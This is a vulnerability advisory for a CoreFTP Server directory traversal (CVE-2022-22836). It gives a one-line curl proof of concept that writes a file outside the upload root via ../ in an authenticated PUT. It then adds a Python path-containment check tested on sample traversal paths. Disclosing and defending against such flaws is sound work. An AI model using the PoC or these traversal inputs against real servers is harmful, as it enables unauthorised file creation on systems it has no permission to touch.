CoreFTP Server Build 725 Directory Traversal

2022.01.10
Credit: LiamInfosec
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22

# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
# Date: 08/01/2022
# Exploit Author: LiamInfosec
# Vendor Homepage: http://coreftp.com/
# Version: build 725 and below
# Tested on: Windows 10
# CVE : CVE-2022-22836

# Description:
CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

# Proof of Concept:
curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
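
A server-side check of the kind that stops this class of bug, as an added example that is not part of the original advisory and is not CoreFTP's code or the vendor's fix: it resolves a PUT request path against a per-user root and refuses anything that would land outside it. It goes beyond the `../` form in the advisory to cover percent-encoded and backslash-separated forms; `UPLOAD_ROOT`, `resolve_put_target` and `audit` are hypothetical names and the sample paths are constructed.

```python
import posixpath
from urllib.parse import unquote

UPLOAD_ROOT = "/srv/ftp/users/alice"  # assumption: one user's upload root


def resolve_put_target(root, raw_path):
    """Return the file path a PUT may write under root, or None to refuse."""
    root = posixpath.normpath(root)
    # Decode once and fold Windows separators, so the check sees the same
    # segments the filesystem layer would.
    decoded = unquote(raw_path).replace("\\", "/")
    if "\x00" in decoded:
        return None
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if not segments:
        return None  # a PUT to the root itself names no file
    for seg in segments:
        # Refuse "..", dot/space-only names that Windows collapses, and ":"
        # (drive letter or alternate data stream) rather than normalising them.
        if seg.rstrip(". ") == "" or ":" in seg:
            return None
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    # Final containment check: the result must still sit under root.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


# Constructed sample request paths (not captured traffic).
SAMPLES = [
    "/reports/q1.txt",
    "/docs/./notes.txt",
    "/../../../../../../whoops",   # the path form used in the advisory
    "/%2e%2e/%2e%2e/whoops",
    "/..\\..\\whoops",
    "/C:/Windows/whoops",
    "/",
]


def audit(paths, root=UPLOAD_ROOT):
    """Map each raw path to its resolved target, or None if refused."""
    return {p: resolve_put_target(root, p) for p in paths}


if __name__ == "__main__":
    for path, target in audit(SAMPLES).items():
        print(f"{path!r:32} -> {target or 'REFUSED'}")
```

The check is lexical only; a deployment that allows symlinks or junctions under the root also needs to resolve the real path before writing.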


Copyright 2022, cxsecurity.com

 
